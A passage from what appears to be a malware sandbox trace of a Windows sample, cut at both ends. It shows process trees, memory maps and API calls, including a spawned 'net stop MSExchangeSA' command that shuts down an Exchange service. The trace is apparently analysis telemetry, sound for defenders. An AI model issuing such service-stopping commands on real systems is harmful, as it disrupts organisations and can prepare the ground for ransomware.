_BufferCount=0x13, _Format="%08X", _ArgList=0x4cbf29c | out: _Buffer="00000002") returned 8 [0140.993] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0140.993] GetEnvironmentStringsW () returned 0x4edb3a8* [0140.993] FreeEnvironmentStringsA (penv="=") returned 1 [0140.993] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0140.993] GetEnvironmentStringsW () returned 0x4edb3a8* [0140.994] FreeEnvironmentStringsA (penv="=") returned 1 [0140.994] DeleteProcThreadAttributeList (in: lpAttributeList=0x4cbf328 | out: lpAttributeList=0x4cbf328) [0140.994] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.994] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x3c [0140.994] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0140.994] _get_osfhandle (_FileHandle=0) returned 0x38 [0140.994] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0140.994] SetConsoleInputExeNameW () returned 0x1 [0140.994] GetConsoleOutputCP () returned 0x1b5 [0140.995] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0140.995] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.995] exit (_Code=2) Thread: id = 753 os_tid = 0xd70 Process: id = "258" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x150bd000" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "257" os_parent_pid = "0xd5c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12295 start_va = 0x7ff53000 end_va = 0x7ff53fff entry_point = 0x0 region_type = private name = "private_0x000000007ff53000" filename = "" Region: id = 12296 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12297 start_va = 0xe570380000 end_va = 0xe57039ffff entry_point = 0x0 region_type = private name = "private_0x000000e570380000" filename = "" Region: id = 12298 start_va = 0xe5703a0000 end_va = 0xe5703b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5703a0000" filename = "" Region: id = 12299 start_va = 0xe5703c0000 end_va = 0xe5703fffff entry_point = 0x0 region_type = private name = "private_0x000000e5703c0000" filename = "" Region: id = 12300 start_va = 0x7df5ffb40000 end_va = 0x7ff5ffb3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb40000" filename = "" Region: id = 12301 start_va = 0x7ff6c4760000 end_va = 0x7ff6c4782fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4760000" filename = "" Region: id = 12302 start_va = 0x7ff6c4786000 end_va = 0x7ff6c4786fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4786000" filename = "" Region: id = 12303 start_va = 0x7ff6c478e000 end_va = 0x7ff6c478ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c478e000" filename = "" Region: id = 12304 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 12305 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12306 start_va = 0xe570380000 end_va = 0xe57038ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e570380000" filename = "" Region: id = 12307 start_va = 0xe570390000 end_va = 0xe570396fff entry_point = 0x0 region_type = private name = "private_0x000000e570390000" filename = "" Region: id = 12308 start_va = 0xe570400000 end_va = 0xe57043ffff entry_point = 0x0 region_type = private name = "private_0x000000e570400000" filename = "" Region: id = 12309 start_va = 0xe570440000 end_va = 0xe570440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e570440000" filename = "" Region: id = 12310 start_va = 0xe570450000 end_va = 0xe570456fff entry_point = 0x0 region_type = private name = "private_0x000000e570450000" filename = "" Region: id = 12311 start_va = 0xe570460000 end_va = 0xe570460fff entry_point = 0x0 region_type = private name = "private_0x000000e570460000" filename = "" Region: id = 12312 start_va = 0xe570470000 end_va = 0xe57056ffff entry_point = 0x0 region_type = private name = "private_0x000000e570470000" filename = "" Region: id = 12313 start_va = 0xe570570000 end_va = 0xe57062dfff entry_point = 0xe570570000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12314 start_va = 0xe570630000 end_va = 0xe570630fff entry_point = 0x0 region_type = private name = "private_0x000000e570630000" filename = "" Region: id = 12315 start_va = 0xe570710000 end_va = 0xe57071ffff entry_point = 0x0 region_type = private name = "private_0x000000e570710000" filename = "" Region: id = 12316 start_va = 0xe570720000 end_va = 0xe5708a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e570720000" filename = "" Region: id = 12317 start_va = 0xe5708b0000 end_va = 0xe570a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e5708b0000" filename = "" Region: id = 12318 start_va = 0xe570a40000 end_va = 0xe571e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e570a40000" filename = "" Region: id = 12319 start_va = 0x7ff6c4660000 end_va = 0x7ff6c475ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4660000" filename = "" Region: id = 12320 start_va = 0x7ff6c478c000 end_va = 0x7ff6c478dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c478c000" filename = "" Region: id = 12321 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 12322 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 12323 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12324 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12325 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 12326 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12327 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12328 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12329 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12330 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12331 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12332 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 12333 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 12334 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 750 os_tid = 0xd3c Thread: id = 751 os_tid = 0xcac Thread: id = 752 os_tid = 0xcc8 Process: id = "259" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1513a000" os_pid = "0x454" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "257" os_parent_pid = "0xd5c" cmd_line = "net stop MSExchangeSA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12348 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 12349 start_va = 0x750000 end_va = 0x474ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 12350 start_va = 0x4750000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 12351 start_va = 0x4770000 end_va = 0x4771fff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 12352 start_va = 0x4780000 end_va = 0x4793fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 12353 start_va = 0x47a0000 end_va = 0x47dffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 12354 start_va = 0x47e0000 end_va = 0x485ffff entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 12355 start_va = 0x4860000 end_va = 0x4863fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 12356 start_va = 0x4870000 end_va = 0x4870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004870000" filename = "" Region: id = 12357 start_va = 0x4880000 end_va = 0x4881fff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 12358 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12359 start_va = 0x7f3f0000 end_va = 0x7f412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3f0000" filename = "" Region: id = 12360 start_va = 0x7f418000 end_va = 0x7f418fff entry_point = 0x0 region_type = private name = "private_0x000000007f418000" filename = "" Region: id = 12361 start_va = 0x7f41b000 end_va = 0x7f41dfff entry_point = 0x0 region_type = private name = "private_0x000000007f41b000" filename = "" Region: id = 12362 start_va = 0x7f41e000 end_va = 0x7f41efff entry_point = 0x0 region_type = private name = "private_0x000000007f41e000" filename = "" Region: id = 12363 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12364 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12365 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12366 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12367 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12368 start_va = 0x4960000 end_va = 0x496ffff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 12369 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12370 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12371 start_va = 0x4a50000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 12372 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 754 os_tid = 0x834 Thread: id = 755 os_tid = 0xd14 Process: id = "260" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x15d5f000" os_pid = "0xd80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "259" os_parent_pid = "0x454" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeSA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12373 start_va = 0xc50000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 12374 start_va = 0xc70000 end_va = 0xc71fff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 12375 start_va = 0xc80000 end_va = 0xc93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 12376 start_va = 0xca0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 12377 start_va = 0xce0000 end_va = 0xd5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 12378 start_va = 0xd60000 end_va = 0xd63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 12379 start_va = 0xd70000 end_va = 0xd70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 12380 start_va = 0xd80000 end_va = 0xd81fff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 12381 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 12382 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 12383 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12384 start_va = 0x7f7a0000 end_va = 0x7f7c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7a0000" filename = "" Region: id = 12385 start_va = 0x7f7c6000 end_va = 0x7f7c6fff entry_point = 0x0 region_type = private name = "private_0x000000007f7c6000" filename = "" Region: id = 12386 start_va = 0x7f7cb000 end_va = 0x7f7cbfff entry_point = 0x0 region_type = private name = "private_0x000000007f7cb000" filename = "" Region: id = 12387 start_va = 0x7f7cd000 end_va = 0x7f7cffff entry_point = 0x0 region_type = private name = "private_0x000000007f7cd000" filename = "" Region: id = 12388 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12389 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12390 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12391 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12392 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12393 start_va = 0xf30000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 12394 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12395 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12396 start_va = 0x5270000 end_va = 0x536ffff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 12397 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12398 start_va = 0xc50000 end_va = 0xc5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 12399 start_va = 0xc60000 end_va = 0xc63fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 12400 start_va = 0xd90000 end_va = 0xe4dfff entry_point = 0xd90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12401 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 12402 start_va = 0xe90000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 12403 start_va = 0x5240000 end_va = 0x524ffff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 12404 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 12405 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 12406 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 12407 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 12408 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 12409 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 12410 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 12411 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 12412 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 12413 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 12414 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 12415 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12416 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 12417 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12418 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12419 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 12420 start_va = 0x7f6a0000 end_va = 0x7f79ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6a0000" filename = "" Region: id = 12421 start_va = 0x7f7c8000 end_va = 0x7f7cafff entry_point = 0x0 region_type = private name = "private_0x000000007f7c8000" filename = "" Region: id = 12422 start_va = 0xc70000 end_va = 0xc73fff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 12423 start_va = 0xf10000 end_va = 0xf12fff entry_point = 0xf10000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 12424 start_va = 0xf40000 end_va = 0xf71fff entry_point = 0xf40000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 756 os_tid = 0xd78 [0140.971] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0140.971] __set_app_type (_Type=0x1) [0140.971] __p__fmode () returned 0x77ac4d6c [0140.971] __p__commode () returned 0x77ac5b1c [0140.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0140.972] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0140.972] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.972] GetConsoleOutputCP () returned 0x1b5 [0140.972] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0140.972] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.974] sprintf_s (in: _DstBuf=0xd5fa64, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0140.974] setlocale (category=0, locale=".437") returned="English_United States.437" [0140.975] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0140.975] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0140.975] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSA" [0140.975] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd5f80c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0140.975] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xd5f800 | out: Buffer=0xd5f800*=0x5278488) returned 0x0 [0140.975] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xd5f804 | out: Buffer=0xd5f804*=0x52785d8) returned 0x0 [0140.975] __iob_func () returned 0x77ac1208 [0140.975] _fileno (_File=0x77ac1208) returned 0 [0140.975] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0140.975] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0140.975] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0140.975] _wcsicmp (_String1="config", _String2="stop") returned -16 [0140.975] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0140.976] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0140.976] _wcsicmp (_String1="file", _String2="stop") returned -13 [0140.976] _wcsicmp (_String1="files", _String2="stop") returned -13 [0140.976] _wcsicmp (_String1="group", _String2="stop") returned -12 [0140.976] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0140.976] _wcsicmp (_String1="help", _String2="stop") returned -11 [0140.976] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0140.976] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0140.976] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0140.976] _wcsicmp (_String1="session", _String2="stop") returned -15 [0140.976] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0140.976] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0140.976] _wcsicmp (_String1="share", _String2="stop") returned -12 [0140.976] _wcsicmp (_String1="start", _String2="stop") returned -14 [0140.976] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0140.976] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0140.976] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0140.976] _wcsicmp 